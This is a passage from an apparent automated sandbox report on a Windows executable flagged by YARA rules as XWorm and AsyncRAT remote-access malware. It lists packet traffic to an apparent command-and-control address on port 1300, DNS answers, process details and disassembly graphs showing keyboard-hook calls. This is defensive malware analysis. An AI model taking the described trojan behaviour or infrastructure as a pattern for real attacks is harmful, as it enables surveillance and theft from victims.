                            Jan 8, 2025 16:04:38.590341091 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:39.664130926 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:39.669044018 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:40.068279028 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:40.070225000 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:40.075052977 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:46.615189075 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:46.664670944 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:48.461266994 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:48.466159105 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:48.523505926 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:48.528348923 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:48.636507034 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:48.639684916 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:48.644618988 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:48.735920906 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:48.744672060 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:48.749597073 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:50.132925034 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:50.137973070 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:50.307584047 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:50.309401989 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:50.314346075 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.664164066 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.669142008 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.679759979 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.684643030 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.695352077 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.700259924 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.711024046 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.715914965 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.742296934 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.747287035 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.757998943 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.762934923 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.838493109 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.841620922 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.846481085 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.867280006 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.872153044 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.898650885 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.903497934 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.914185047 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.919003963 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.935123920 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.941337109 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.987670898 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.008621931 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.010341883 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.015763044 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.015815973 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.020593882 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.104399920 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.106204033 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.111022949 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.199621916 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.201683998 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.206950903 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.207000971 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.212394953 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.295618057 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.299412966 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.304306030 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:59.898597002 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:59.903614044 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:05:00.072731018 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:05:00.073652983 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:05:00.078478098 CET13004975787.120.116.179192.168.2.9

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 8, 2025 16:01:11.763698101 CET53587081.1.1.1192.168.2.9

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 8, 2025 16:00:52.055701017 CET1.1.1.1192.168.2.90x165aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                            Jan 8, 2025 16:00:52.055701017 CET1.1.1.1192.168.2.90x165aNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Jan 8, 2025 16:00:52.055701017 CET1.1.1.1192.168.2.90x165aNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:10:00:52
                            Start date:08/01/2025
                            Path:C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe"
                            Imagebase:0x3d0000
                            File size:36'864 bytes
                            MD5 hash:5AB0DB61A062D4AC36716B51C5DDAC3A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:18.5%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:3
                              Total number of Limit Nodes:0
                              execution_graph 4727 7ff887d31592 4728 7ff887d31c10 SetWindowsHookExW 4727->4728 4730 7ff887d31cc1 4728->4730

                              Executed Functions

                              Function 00007FF887D32A00 Relevance: 2.4, Strings: 1, Instructions: 1137COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 332 7ff887d32a00-7ff887d3a693 334 7ff887d3a6dd-7ff887d3a6f0 332->334 335 7ff887d3a695-7ff887d3a6a0 call 7ff887d305c0 332->335 337 7ff887d3a6f2-7ff887d3a70f 334->337 338 7ff887d3a766 334->338 339 7ff887d3a6a5-7ff887d3a6f0 335->339 341 7ff887d3a76b-7ff887d3a780 337->341 342 7ff887d3a711-7ff887d3a761 call 7ff887d39530 337->342 338->341 339->337 339->338 346 7ff887d3a799-7ff887d3a7ae 341->346 347 7ff887d3a782-7ff887d3a794 call 7ff887d305d0 341->347 367 7ff887d3b339-7ff887d3b347 342->367 354 7ff887d3a7e1-7ff887d3a7f6 346->354 355 7ff887d3a7b0-7ff887d3a7dc 346->355 347->367 362 7ff887d3a809-7ff887d3a81e 354->362 363 7ff887d3a7f8-7ff887d3a804 call 7ff887d38510 354->363 355->367 372 7ff887d3a820-7ff887d3a823 362->372 373 7ff887d3a864-7ff887d3a879 362->373 363->367 372->338 374 7ff887d3a829-7ff887d3a834 372->374 377 7ff887d3a87b-7ff887d3a87e 373->377 378 7ff887d3a8ba-7ff887d3a8cf 373->378 374->338 376 7ff887d3a83a-7ff887d3a85f call 7ff887d305a8 call 7ff887d38510 374->376 376->367 377->338 379 7ff887d3a884-7ff887d3a88f 377->379 385 7ff887d3a8fc-7ff887d3a911 378->385 386 7ff887d3a8d1-7ff887d3a8d4 378->386 379->338 382 7ff887d3a895-7ff887d3a8b5 call 7ff887d305a8 call 7ff887d32a50 379->382 382->367 395 7ff887d3a9fd-7ff887d3aa12 385->395 396 7ff887d3a917-7ff887d3a977 call 7ff887d30530 385->396 386->338 388 7ff887d3a8da-7ff887d3a8f7 call 7ff887d305a8 call 7ff887d32a58 386->388 388->367 403 7ff887d3aa31-7ff887d3aa46 395->403 404 7ff887d3aa14-7ff887d3aa17 395->404 396->338 435 7ff887d3a97d-7ff887d3a9b5 call 7ff887d38520 396->435 413 7ff887d3aa68-7ff887d3aa7d 403->413 414 7ff887d3aa48-7ff887d3aa4b 403->414 404->338 407 7ff887d3aa1d-7ff887d3aa27 call 7ff887d32a30 404->407 412 7ff887d3aa28-7ff887d3aa2c 407->412 412->367 421 7ff887d3aa7f-7ff887d3aa98 413->421 422 7ff887d3aa9d-7ff887d3aab2 413->422 414->338 416 7ff887d3aa51-7ff887d3aa63 call 7ff887d32a30 414->416 416->367 421->367 426 7ff887d3aad2-7ff887d3aae7 422->426 427 7ff887d3aab4-7ff887d3aacd 422->427 432 7ff887d3aae9-7ff887d3ab02 426->432 433 7ff887d3ab07-7ff887d3ab1c 426->433 427->367 432->367 438 7ff887d3ab1e-7ff887d3ab21 433->438 439 7ff887d3ab45-7ff887d3ab5a 433->439 435->338 452 7ff887d3a9bb-7ff887d3a9da call 7ff887d38530 435->452 438->338 441 7ff887d3ab27-7ff887d3ab40 438->441 446 7ff887d3abfa-7ff887d3ac0f 439->446 447 7ff887d3ab60-7ff887d3abd8 439->447 441->367 453 7ff887d3ac11-7ff887d3ac22 446->453 454 7ff887d3ac27-7ff887d3ac3c 446->454 447->338 478 7ff887d3abde-7ff887d3abf5 447->478 452->412 465 7ff887d3a9dc-7ff887d3a9f8 452->465 453->367 461 7ff887d3acdc-7ff887d3acf1 454->461 462 7ff887d3ac42-7ff887d3ac5d 454->462 471 7ff887d3ad09-7ff887d3ad1e 461->471 472 7ff887d3acf3-7ff887d3ad04 461->472 465->367 479 7ff887d3ad5f-7ff887d3ad74 471->479 480 7ff887d3ad20-7ff887d3ad5a call 7ff887d30ec0 call 7ff887d39530 471->480 472->367 478->367 485 7ff887d3ae1b-7ff887d3ae30 479->485 486 7ff887d3ad7a-7ff887d3ae16 call 7ff887d30ec0 call 7ff887d39530 479->486 480->367 491 7ff887d3aebe-7ff887d3aed3 485->491 492 7ff887d3ae36-7ff887d3ae39 485->492 486->367 499 7ff887d3aee7-7ff887d3aefc 491->499 500 7ff887d3aed5-7ff887d3aee2 call 7ff887d39530 491->500 493 7ff887d3ae3b-7ff887d3ae46 492->493 494 7ff887d3aeb3-7ff887d3aeb8 492->494 493->494 498 7ff887d3ae48-7ff887d3aeb1 call 7ff887d30ec0 call 7ff887d39530 493->498 508 7ff887d3aeb9 494->508 498->508 512 7ff887d3aefe-7ff887d3af38 call 7ff887d30ec0 call 7ff887d39530 499->512 513 7ff887d3af3d-7ff887d3af52 499->513 500->367 508->367 512->367 520 7ff887d3af58-7ff887d3af69 513->520 521 7ff887d3afdd-7ff887d3aff2 513->521 520->338 530 7ff887d3af6f-7ff887d3af7f call 7ff887d305a0 520->530 532 7ff887d3b032-7ff887d3b047 521->532 533 7ff887d3aff4-7ff887d3aff7 521->533 543 7ff887d3afbb-7ff887d3afd8 call 7ff887d305a0 call 7ff887d305a8 call 7ff887d32a08 530->543 544 7ff887d3af81-7ff887d3afb6 call 7ff887d39530 530->544 545 7ff887d3b049-7ff887d3b053 call 7ff887d391f0 532->545 546 7ff887d3b08d-7ff887d3b0a2 532->546 533->338 536 7ff887d3affd-7ff887d3b02d call 7ff887d30598 call 7ff887d305a8 call 7ff887d32a08 533->536 536->367 543->367 544->367 558 7ff887d3b058-7ff887d3b088 call 7ff887d380f0 call 7ff887d32a10 545->558 562 7ff887d3b10c-7ff887d3b121 546->562 563 7ff887d3b0a4-7ff887d3b107 call 7ff887d30ec0 call 7ff887d39530 546->563 558->367 562->367 582 7ff887d3b127-7ff887d3b241 call 7ff887d38540 call 7ff887d38550 call 7ff887d38560 call 7ff887d38570 call 7ff887d32140 call 7ff887d38580 call 7ff887d38550 call 7ff887d38560 562->582 563->367 618 7ff887d3b243-7ff887d3b247 582->618 619 7ff887d3b2b2 582->619 622 7ff887d3b249-7ff887d3b2a8 call 7ff887d38590 call 7ff887d385a0 618->622 623 7ff887d3b2c8-7ff887d3b30e call 7ff887d305b0 call 7ff887d39530 618->623 620 7ff887d3b30f-7ff887d3b338 619->620 621 7ff887d3b2b4-7ff887d3b2c7 call 7ff887d30ec0 619->621 620->367 621->623 622->619 623->620
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: 3f71ae5e58a89971e612dcb1a02211d5c70652a0fa35b0ebaaa7dceb980adaf8
                              • Instruction ID: d829f0b8c6b355c69f931bfaafdb7bf5354170167e31869c5ba17ffc6807470f
                              • Opcode Fuzzy Hash: 3f71ae5e58a89971e612dcb1a02211d5c70652a0fa35b0ebaaa7dceb980adaf8
                              • Instruction Fuzzy Hash: F9725E30F5891A4BFB94EB78849567DB2E2FF98380B504679D45FD32C6EE2CE8428741
                              Function 00007FF887D368E6 Relevance: .5, Instructions: 474COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9524b388ba05185975f3474c97a1be398ae0d95710e3f58e1429c63d5948224d
                              • Instruction ID: 9026178bf3b4724483ae8b4e814b683459b4022ecbff6028ed4c4cb61f6ce7f8
                              • Opcode Fuzzy Hash: 9524b388ba05185975f3474c97a1be398ae0d95710e3f58e1429c63d5948224d
                              • Instruction Fuzzy Hash: 73F1B730508A8E8FEBA8DF28C8557E977E1FF55340F04426EE85EC7295DB389945CB82
                              Function 00007FF887D37692 Relevance: .5, Instructions: 460COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 65a4f5dbd3bbff538431435abb20a28666b7387f62d65d6c6c5fafeef35b0bff
                              • Instruction ID: ae442351349b44d93e93139596f56c05dbf5d4cf7f005ad62d374ed66e88ca84
                              • Opcode Fuzzy Hash: 65a4f5dbd3bbff538431435abb20a28666b7387f62d65d6c6c5fafeef35b0bff
                              • Instruction Fuzzy Hash: 4AE1A230908A8E8FEBA8DF28C8557E937E1FF54355F04436ED84EC7295DA789841CB82
                              Function 00007FF887D31BE8 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 647 7ff887d31be8-7ff887d31bef 648 7ff887d31bfa-7ff887d31c6d 647->648 649 7ff887d31bf1-7ff887d31bf9 647->649 653 7ff887d31cf9-7ff887d31cfd 648->653 654 7ff887d31c73-7ff887d31c78 648->654 649->648 655 7ff887d31c82-7ff887d31cbf SetWindowsHookExW 653->655 656 7ff887d31c7f-7ff887d31c80 654->656 657 7ff887d31cc1 655->657 658 7ff887d31cc7-7ff887d31cf8 655->658 656->655 657->658
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: cdc5028db1f3fa523ae20b04a11227c0028f4ca21ec65d57df31d9d2c12f1884
                              • Instruction ID: 4c51ec24a3293da1821cb523f1c9c53b048379d865adcc9ad2b16186132b1f69
                              • Opcode Fuzzy Hash: cdc5028db1f3fa523ae20b04a11227c0028f4ca21ec65d57df31d9d2c12f1884
                              • Instruction Fuzzy Hash: BA31E831A1CA4D4FDB08EB6CD8066F9BBE1FB55311F00427ED049D3192DE65A852C791
                              Function 00007FF887D31592 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 661 7ff887d31592-7ff887d31c6d 665 7ff887d31cf9-7ff887d31cfd 661->665 666 7ff887d31c73-7ff887d31c78 661->666 667 7ff887d31c82-7ff887d31cbf SetWindowsHookExW 665->667 668 7ff887d31c7f-7ff887d31c80 666->668 669 7ff887d31cc1 667->669 670 7ff887d31cc7-7ff887d31cf8 667->670 668->667 669->670
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: de2868e3520a159ddffba0b16eceb450802f4a0bcef543e7c5507ef4b7b82843
                              • Instruction ID: 0ae2c09916d4a7079c522e3d0ac8f94dc2ab6041897daf4840f31cf9c430c4ad
                              • Opcode Fuzzy Hash: de2868e3520a159ddffba0b16eceb450802f4a0bcef543e7c5507ef4b7b82843
                              • Instruction Fuzzy Hash: 7B31B430A1CA1D8FEB58EB5CD84A6FDB7E1EB59311F10423ED00ED3251DA65A852C7C1